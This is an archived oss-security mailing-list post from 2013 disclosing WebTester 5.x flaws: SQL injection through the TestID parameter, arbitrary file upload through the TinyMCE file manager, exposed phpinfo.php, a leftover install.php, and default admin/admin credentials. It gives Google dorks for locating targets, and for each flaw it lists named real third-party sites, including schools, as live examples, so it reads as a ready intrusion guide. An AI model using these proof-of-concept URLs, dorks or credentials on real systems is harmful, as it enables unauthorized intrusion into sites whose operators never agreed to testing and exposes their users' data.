|
Message-ID: <1381887056.76332.YahooMailNeo@web190703.mail.sg3.yahoo.com> Date: Wed, 16 Oct 2013 09:30:56 +0800 (SGT) From: X-Cisadane <stefanus_dp@...il.com> To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com> Subject: WebTester 5.x Multiple Vulnerabilities ========================================================================================== WebTester 5.x Multiple Vulnerabilities ========================================================================================== :-------------------------------------------------------------------------------------------------------------------------- --------------: : # Exploit Title : WebTester 5.x Multiple Vulnerabilities : # Date : 15 October 2013 : # Author : X-Cisadane : # CMS Developer : http://epplersoft.com/webtester.html : # CMS Source Code : http://sourceforge.net/projects/webtesteronline/ : # Version : ALL : # Category : Web Applications : # Vulnerability : SQL Injection, Arbitrary File Upload, PHPInfo() Disclosure, Leftover install.php File : # Tested On : Google Chrome Version 26.0.1410.64 m (Windows XP SP 3 32-Bit English) : # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari :-------------------------------------------------------------------------------------------------------------------------- --------------: DORKS (How to find the target) : ================================ intext:Copyright © 2003 - 2010 Eppler Software inurl:/go.php?testID= intitle:WebTester Online Testing Or use your own Google Dorks :) Proof of Concept ================ [ 1 ] SQL Injection POC : http://[Site]/[Path]/startTest.php?FirstName=a&LastName=a&TestID=['SQLi] Example : http://simuladodireitocespe.com/startTest.php?FirstName=a&LastName=a&TestID='5 http://www.huertos.eu/encuesta/startTest.php?FirstName=a&LastName=a&TestID='5 http://autoskola-buratrans.com/templates/default/ispiti/startTest.php?FirstName=a&LastName=a&TestID='5 http://conalepnl091.sytes.net/simulador/startTest.php?FirstName=a&LastName=a&TestID='5 http://learnin.elschool.pl/startTest.php?FirstName=a&LastName=a&TestID='5 ...etc... [ 2 ] Arbitrary File Upload through TinyMCE (plugins/filemanager) Webster 5.x has a built-in WYSIWYG Editor, that is TinyMCE. The attacker can upload file through the TinyMCE File Manager. It can be found in tiny_mce/plugins/filemanager. Poc : http://[Site]/[Path]/tiny_mce/plugins/filemanager/InsertFile/insert_file.php Example the target is http://onlinetests.germaniak.eu/ Change the url to http://onlinetests.germaniak.eu/tiny_mce/plugins/filemanager/InsertFile/insert_file.php Pic #1 : http://i40.tinypic.com/117z390.png Then tick : Insert filetype icon, Insert file size & Insert file modification date. Click upload and wait until the file sent to the server. Pic #2 : http://i39.tinypic.com/2wluaon.png Pic #3 : http://i40.tinypic.com/2uh0fir.png If the file was successfully uploaded, check in the /test-images/ directory. For Example : http://onlinetests.germaniak.eu/test-images/ http://www.rzecznik.org/test/test-images/ http://simula.se/fun/webtester5/test-images/ http://811lifestylecoach.com/test-images/ http://umpire-test.splashprojects.co.uk/test-images/ http://zamoweb.altervista.org/test-images/ ...etc... [ 3 ] PHPInfo() Disclosure POC : http://[Site]/[Path]/phpinfo.php Example : http://mhsquiz.marbleheadschools.org/webtester/phpinfo.php http://test.auzefiu.com/phpinfo.php http://test.deltaschools.com/phpinfo.php http://www.noordskool.com/toetse/phpinfo.php http://bocahomehealth.com/exam/phpinfo.php ...etc... [ 4 ] Leftover install.php File POC : http://[Site]/[Path]/install.php Example : http://www.ibeucamposmacae.com.br/webtester5/install.php http://briefhealthprograms.com/webtester5/install.php http://intgvna.gardnervna.org/test/install.php http://delarcollege.com/POSTUTME/install.php http://www.orionhs.org/webtester/install.php ...etc... Bonus : Default Username and Password Username : admin Password : admin Admin Control Panel : http://[Site]/[Path]/admin/ Sent from my BlackBerry® smartphone from Sinyal Bagus XL, Nyambung Teruuusss...! ________________________________ Content of type "text/html" skipped View attachment "Proof of Concept.txt" of type "text/plain" (3948 bytes)
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.